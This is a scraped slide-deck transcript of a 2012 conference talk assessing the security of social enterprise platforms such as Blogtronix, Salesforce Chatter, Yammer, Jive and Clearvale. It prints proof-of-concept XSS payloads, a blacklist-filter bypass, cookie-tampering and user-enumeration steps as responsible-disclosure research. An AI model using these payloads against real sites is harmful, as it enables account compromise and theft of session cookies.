Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Social Enterprise Rises! …and so are the Risks - DefCamp 2012

780 views

Published on

  • Be the first to comment

  • Be the first to like this

Social Enterprise Rises! …and so are the Risks - DefCamp 2012

  1. 1. Social Enterprise Software Rises!…and so are the RisksMarian Ventuneacmarian.ventuneac@gmail.com@mventuneac
  2. 2. About myself Security Architect International presenter Member of OWASP and ISACA global organizations OWASP Ireland Limerick Chapter Leader https://www.owasp.org/index.php/Ireland-Limerick Security Researcher PhD, MEng http://www.ventuneac.net http://secureappdev.blogspot.com http://dcsl.ul.ie2 An Introduction to Web Application Security Risks
  3. 3. Agenda Social Enterprise Software: What, Why, and How? Social Enterprise Software & Risks Thoughts on Calculated Risk Social Enterprise Software & Risks (some case studies) Final Thoughts3 An Introduction to Web Application Security Risks
  4. 4. Social Enterprise Software: What? Social Enterprise/Social Enterprise Networks/Social Enterprise Software Enterprise solutions providing Facebook-like social networking functionality ‘social networking’ + ‘enterprise software’ = ‘social enterprise networking’4 An Introduction to Web Application Security Risks
  5. 5. Social Enterprise Software: Why? Improve communication an increase work efficiency  internal collaboration  establish teams, communities or informal groups  share knowledge and learn from other people experiences  social networking  external collaboration with partners … Used by employees and external customers, suppliers, partners5 An Introduction to Web Application Security Risks
  6. 6. Social Enterprise Software: Deployment models On-premise solutions  Deployed inside the enterprise network, usually controlled and managed by the client Public Cloud-based solutions  Software as a Service (SaaS) - Hosted and administered by the vendor Hybrid deployments Usually open to allow external collaboration  customers, suppliers, third-party contractors, etc6 An Introduction to Web Application Security Risks
  7. 7. Social Enterprise Software: Some of the Risks Potential loss of enterprise data  Understand what type of data needs to be uploaded there  Do you know/control what data is actually being shared? Exploitation of common application vulnerabilities Phishing attacks, social engineering Viruses and malware Cloud-based solutions – various compliance and security concerns  Do you know where is your data stored?7 An Introduction to Web Application Security Risks
  8. 8. Common Strategies for Risk Mitigation Vendor/supplier due diligence Security policies (generic/dedicated) Security processes & procedures  Control the data being shared (data classification)  Verify identity of users accessing the data (authentication)  Control user access to data  Approve/Create/Lock user accounts (accounts management)  Remote wipe (for mobile devices – smartphone, tablets, etc) …8 An Introduction to Web Application Security Risks
  9. 9. Calculated Risks9 An Introduction to Web Application Security Risks
  10. 10. Calculated Risks (cont) Business requirement: WE (the company) need social enterprise software X for Y and Z reasons. IT Security (most likely take on it):  Scenario 1: No, there is to much risk to take!  Scenario 2: Yes - We trust our partners and their choices.  Scenario 3: Yes - IF Business ASSUMES ALL THE RISKS…  Scenario 4: Let’s take a closer look at it…  Scenario 5: Yes - the vendor is big enough and we can trust it (= the vendor takes application security seriously)10 An Introduction to Web Application Security Risks
  11. 11. Let’s Take a Closer Look Software defects leading to exploitation of security vulnerabilities  OWASP Top 10 Security Risks  CVE/SANS Top 25 Programming Errors Vendor size – a plus, but doesn‘t guarantee the chosen solution is vulnerability free It is safe to assume there is no application 100% secure If anyone claims such a thing, can they provide reasonable proof? An Introduction to Web Application Security Risks
  12. 12. Let’s Take a Closer Look (cont) Trust but verify  Reach an agreement to test the chosen solution in a suitable environment (ideally prior of any contracts being signed)  Manual security testing  Automated security testing  Responsible disclosure Most likely you will not be disappointed  An Introduction to Web Application Security Risks
  13. 13. The Closer Look (cont) A practical take on assessing security of social enterprise software solutions Some of the chosen ones An Introduction to Web Application Security Risks
  14. 14. The Closer Look (cont) Assessment criteria including tests for  Cross-Site Scripting (XSS)  Insecure Direct Object Reference  Security Missconfiguration  Failure to Restrict URL Access  Unvalidated Redirects and Forwards  Logical Flaws … An Introduction to Web Application Security Risks
  15. 15. Blogtronix Enterprise Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS CVE-2011-1039 - Multiple XSS Vulnerabilities  Persistent (partially) XSS via Search functionality (auth. user) HTTP request: http://test_site/Home/pages/search/?search= <script>alert(document.cookie)</script> &sub=1&tab=0 HTTP response: … <a href="/Home/pages/search/?search=%3cscript %3ealert(document.cookie)%3b&amp;sub=1 &amp;tab=0"> <script>alert(docume...</a> </span> <span style=“ … An Introduction to Web Application Security Risks
  16. 16. Blogtronix Enterprise (cont) CVE-2011-1039 - Multiple XSS Vulnerabilities  Reflected XSS in login page via arbitrary parameter HTTP request: https://test_site/pages/login/?a"> <script>alert(document.cookie)</script> HTTP response: <form method="post" action="/pages/login/? a"><script>alert(document.cookie)</script>" id="aspnetForm">  Multiple Reflected XSS via existing and arbitrary parameters of existing resources An Introduction to Web Application Security Risks
  17. 17. Blogtronix Enterprise (cont) Insecure Direct Object Reference (variant)  Valid user A can potentially impersonate another user B  Tamper value of userAccountID_http://test_site/ cookie (ASP.NET GUID)1. At login time - replace value of userAccountID_ cookie with the one matching user B 2. Do something noticeable (post a message in group X) & log out 3. As authenticated user A, review user recent B’s activity – user B appears as a recent visitor of group X An Introduction to Web Application Security Risks
  18. 18. Blogtronix Enterprise (cont) Security Missconfiguration Enumerate valid user IDs  Unauthenticated attacker checks for https://test_site/users/user_id  if user_id exists, redirected to login  if not, display custom error Enumerate valid groups  Unauthenticated attacker checks for https://test_site/group_id/pages/people/  if group_id exists, redirected to login  if not, display custom error An Introduction to Web Application Security Risks
  19. 19. Blogtronix Enterprise (cont) Improper Error Handling An Introduction to Web Application Security Risks
  20. 20. Blogtronix Enterprise (cont) CVE-2011-1040 Unvalidated Redirects https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f  Once the user logs in, he/she gets redirected to the resource previously stated via ReturnUrl parameter CVE-2011-1041 Failure to restrict access to protected resources  Attacker knows hashed user ID and name of uploaded file => file can be accessed without auth.  Attacker knows hashed user ID => user profile picture can be accessed without auth. An Introduction to Web Application Security Risks
  21. 21. Salesforce Chatter SaaS Multiple persistent XSS vulnerabilities  via user profile first & last name <a href="/005D00000022Ouw" class= "entityLink" title="Adam" onmouseover="alert(1)" Cole"> Adam&quot; onmouseover=&quot;alert(1)& quot; Cole</a>  via group name <a href="/0F9D0000000PPwz" class= "entityLink" title="test_group" onmouseover="alert(3)"">test_group& quot; onmouseover=&quot;alert(3)&quot;</a> An Introduction to Web Application Security Risks
  22. 22. Salesforce Chatter SaaS (cont) Improper User Input Validation  File Sharing - CR LF symbols accepted into file title (via SaaS solution) POST /mobile/direct/23.0/ 005D0000001yD7B/feed_items.json HTTP/1.1 Host: eu1.salesforce.com … Content-Disposition: form-data; name="title” arv_test52%0a%0d%0a An Introduction to Web Application Security Risks
  23. 23. Salesforce Chatter Desktop Improper Error Handling leading to Information Disclosure  submitting comments for inexistent posts HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1 Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149nORA-06512: at "DOPEY.CFEEDCOMMENT", line 253nORA-06512: at line 1n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}  attempting to ‘like’ and inexistent post HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1 Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at "DOPEY.CFEEDLIKE", line 156nORA-06512: at "DOPEY.CFEEDLIKE", line 217nORA-06512: at "DOPEY.CFEEDLIKE", line 118nORA-06512: at line 1n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"} An Introduction to Web Application Security Risks
  24. 24. Yammer Persistent XSS via group nameHTTP POST request:/ventuneac.net/groups HTTP/1.1Host: www.yammer.com…-----------------------------295562556131627Content-Disposition: form-data; name="group[name]"a4" onmouseover="alert(4)"-----------------------------295562556131627HTTP response (home page):GET /ventuneac.net/ HTTP/1.1Host: www.yammer.com…<a href="/ventuneac.net/groups/a4onmouseoveralert4"class="nav-list-link" title="a4" onmouseover="alert(4)" group"> An Introduction to Web Application Security Risks
  25. 25. Jive Persistent XSS via group name (create/edit)HTTP POST request:POST /create-group.jspa HTTP/1.1Host: ventuneac.jiveon.com…-----------------------------215202979014924Content-Disposition: form-data; name="description"group2"><script>alert(1)</script>-----------------------------215202979014924HTTP response (load group from Places):GET /groups/group2 HTTP/1.1Host: ventuneac.jiveon.com…<meta name="description" content="group2"><script>alert(1)</script>" /> An Introduction to Web Application Security Risks
  26. 26. BroadVision Clearvale SaaS Multiple persistent XSS vulnerabilities  via user profile first & last name & search page <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession( document.location(http://www.google.co.uk))"> m&quot; style=&quot;xss:expr/*XS...</a>  via group name & search page <a href="http://vmarian.clearvale.com/pg/groups/ 23/aaaa-stylexssexprxssessiondocumentlocation httpwwwgooglecouk/" title="aaa"> <a style="xss:expr/*XSS*/ession( document.location(http://www.google.co.uk))"> aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a> An Introduction to Web Application Security Risks
  27. 27. BroadVision Clearvale SaaS (cont) The broken fix for user profile name XSS issue  Black-list user input validation style followed by = becomes style00 (style=, style =, etc) document.location followed by ( becomes document.location00 alert followed by ( becomes 00 /* becomes /0* for first instance only */ becomes *0/ …  Improper output escaping An Introduction to Web Application Security Risks
  28. 28. BroadVision Clearvale SaaS (cont) The broken fix for user profile name XSS issue  Bypassing Clearvale XSS filter XSS payload: firstname: m” style lastname: ="/**/;xss:expr/**/ession(alert/**/(aaa)) HTTP response: … <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/(aaa)) ">m&quot; style =&quot;/0**0/;xss:...</a> An Introduction to Web Application Security Risks
  29. 29. Knowing What ‘private’ Really Means Social Enterprise Software usually provides document sharing/publishing functionality  Private (not shared with anyone – default option)  Shared with private (locked) groups/members  Shared with public groups  Shared with everyone (shared via public link) In certain conditions, the private documents can become… less private  An Introduction to Web Application Security Risks
  30. 30. AntiVirus & anti-malware file scanningBroadVision Clearvale has a built-in AV scanning engineThe rest of tested solutions currently lack such capabilitiesYammer and Salesforce plan to add AV file scanningNo malicious files were used for testing AV capabilities An Introduction to Web Application Security Risks
  31. 31. The Closer Look: SummaryCommon security vulnerabilities - can be easily exploitedUser shared information is not properly validated and sanitised  A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc  Where such user controlled data is seen/accessed by other users, their accounts can easily get compromisedExploitation of such vulnerabilities could severely compromise security of enterprise data An Introduction to Web Application Security Risks
  32. 32. Final ThoughtsEven if the vendor is a market leader, it doesn’t necessarily mean they get application security rightDare to ask for proofs of application security Trust but verifyVendor due diligence, social enterprise software related security policies & security procedures, etcInterested on this kind of benchmarks? OWASP Security Baseline Project https://www.owasp.org/index.php/OWASP_Security_Baseline_Project An Introduction to Web Application Security Risks
  33. 33. Thank Youmarian.ventuneac@gmail.com@mventuneac

×